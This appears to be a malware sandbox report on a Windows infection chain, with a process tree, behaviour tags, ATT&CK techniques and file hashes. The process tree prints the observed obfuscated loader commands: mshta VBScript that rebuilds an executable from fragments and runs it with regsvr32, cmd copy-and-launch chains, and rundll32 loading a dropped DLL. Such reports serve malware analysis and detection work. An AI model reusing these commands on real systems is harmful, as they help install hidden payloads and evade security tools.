C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe") do taskkill -Im "%~NxU" -f2⤵PID:3520
-
C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt3⤵PID:4112
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))4⤵PID:4364
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe") do taskkill -Im "%~NxU" -f5⤵PID:4756
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL"). RUn( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )4⤵PID:3000
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN5⤵PID:4580
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "6⤵PID:6736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"6⤵PID:6892
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /S YLIH.bIN6⤵
- Loads dropped DLL
PID:5052
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Mon175e6c8b40064b8c8.exe" -f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-FOEBL.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-FOEBL.tmp\Mon17bbf11fdb575d.tmp" /SL5="$201F8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe" /SILENT1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3988 -
C:\Users\Admin\AppData\Local\Temp\is-GCHC3.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-GCHC3.tmp\postback.exe" ss12⤵
- Executes dropped EXE
PID:4208
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe"C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe" /SILENT1⤵
- Executes dropped EXE
PID:3340
-
C:\Users\Admin\AppData\Local\Temp\is-R74LV.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-R74LV.tmp\Mon17bbf11fdb575d.tmp" /SL5="$C003A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1060
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17afe24e0084db3.exeMon17afe24e0084db3.exe1⤵PID:1908
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6644 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:7048
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8060 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:8092
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Modifies data under HKEY_USERS
PID:6476
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4436
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8008
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:6904
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5524 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7FA35D192230D29377C29CDBACC7765C C2⤵PID:8468
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AAEACF3D768C17F520F52CCF62B7C6F62⤵
- Blocklisted process makes network request
PID:8020 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:7264
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D76F3200D734577D59F6D8DE32425393 E Global\MSI00002⤵PID:7984
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8240 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Modifies registry class
PID:8128
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1200 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7344
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6308 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3140
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Modifies system certificate store
PID:6368 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6756
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:6644
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7420
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8296
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1076
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4784
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6660
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7800
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5592
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵PID:3140
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:5296
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7072
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:8708
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5688
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:496
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4924
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:8632
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:3520
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3240
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5696
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1168
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8196
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7000
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:8780
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:1240
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:7352
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6584
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5724
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8328
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:300
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:7972
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8152
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1188
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5444
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:9164
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:6348
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2548
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:8188
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5792
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:2492
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4260
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4172
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2884
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2244
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7544
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:2036
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2272 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 12854B89113AB425041468445F4B722A C2⤵PID:7688
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 32834F0842D4ACB6674D642FAD4FC5632⤵PID:4868
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:8908
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 16E225FB0E95FD68458D8CD2C5EB5F00 E Global\MSI00002⤵PID:8976
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8296 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3944
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5404
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:7648
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
3Install Root Certificate
1Modify Registry
8Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5a33c18e1e6540669b2ff3bd88d41c584
SHA142e0d01275929863e9d79316d33ecc687ec0d2b7
SHA2569cc1305d134fabf6a3eeb6e7ada31be91dadd1ae8b66fd5c48f7149b7c91298d
SHA512490d67c0c78dc006dcea5d19f8025c3a5e3391342976201633c6d83e013d4dfb995c8c2e9b341ef5a2a470b61fb08efa40a579a54808ab916f11ffb45b534096
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5f46b901ef268bf9d254867fd8d74fb5a
SHA115a4482e156a87b7c98c9575ede2acb53383c68f
SHA256c0415ac7c00b6f2f47f3fb2fe35d07b98651c48e42802b0249f78c82c3999556
SHA512045855a04844feaecc481130deacb92e9ab5989af71ccc79be9dd933ad60cb953d8f16f2c60ed59249adb66de3df971bda2728eb279ef772e9060bbb868a7f84
-
MD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
MD5
bcb1f4325fc6f66e06d27bc0b680940b
SHA1d426b19ab01b43dc173eefe4db1fe6d7304a6f5b
SHA2566d1fbff085cc6e783b306932a047463455deaca5c62757f50ee2babad6768952
SHA512488e36e25cea1f0a946edc787259d3e3bf66953d579a24e56efe02020dd8765d99a6f1e1b7727bede3aa9e80696fe068bb57efc333cef41528edc7743f953464
-
MD5
627921c5516546bf5e3c022bc732315d
SHA1c15421b4ebf2c992fd6698c44043f1d0c24d0f6e
SHA256d01e7379a9d2440076a17d88a848deedc1e9187f5697bc644de67cae2d08caf6
SHA51266e5a7eacb4b2d1ec9bcf6bd340cede116db39707efc7e6a7fb8ec93ba3abd2cc8fb023bd971b9da41b69d9469c0445bf821784466bbdd52d5e456d7cd9f4994
-
MD5
627921c5516546bf5e3c022bc732315d
SHA1c15421b4ebf2c992fd6698c44043f1d0c24d0f6e
SHA256d01e7379a9d2440076a17d88a848deedc1e9187f5697bc644de67cae2d08caf6
SHA51266e5a7eacb4b2d1ec9bcf6bd340cede116db39707efc7e6a7fb8ec93ba3abd2cc8fb023bd971b9da41b69d9469c0445bf821784466bbdd52d5e456d7cd9f4994
-
MD5
b3297e6a01982c405b14ae61e4d08f50
SHA1857e4bca996e204bfa0b3713cd4ada71096edf0c
SHA256c37e330f97f7a2b2ec7c3ad76f1770dc75198b384dd6be64b6c5c8aa336c50da
SHA512f614ba048d184bce6818e0d97fafbb40d82e279aeb2322b79005007229fd1cf115a510c5d88f48429354ba396738fe7e08f25715afbe897de7333c305c8fdd1a
-
MD5
b3297e6a01982c405b14ae61e4d08f50
SHA1857e4bca996e204bfa0b3713cd4ada71096edf0c
SHA256c37e330f97f7a2b2ec7c3ad76f1770dc75198b384dd6be64b6c5c8aa336c50da
SHA512f614ba048d184bce6818e0d97fafbb40d82e279aeb2322b79005007229fd1cf115a510c5d88f48429354ba396738fe7e08f25715afbe897de7333c305c8fdd1a
-
MD5
b3297e6a01982c405b14ae61e4d08f50
SHA1857e4bca996e204bfa0b3713cd4ada71096edf0c
SHA256c37e330f97f7a2b2ec7c3ad76f1770dc75198b384dd6be64b6c5c8aa336c50da
SHA512f614ba048d184bce6818e0d97fafbb40d82e279aeb2322b79005007229fd1cf115a510c5d88f48429354ba396738fe7e08f25715afbe897de7333c305c8fdd1a
-
MD5
b3297e6a01982c405b14ae61e4d08f50
SHA1857e4bca996e204bfa0b3713cd4ada71096edf0c
SHA256c37e330f97f7a2b2ec7c3ad76f1770dc75198b384dd6be64b6c5c8aa336c50da
SHA512f614ba048d184bce6818e0d97fafbb40d82e279aeb2322b79005007229fd1cf115a510c5d88f48429354ba396738fe7e08f25715afbe897de7333c305c8fdd1a
-
MD5
0dd2e0883f7c067e98676e42024ad4aa
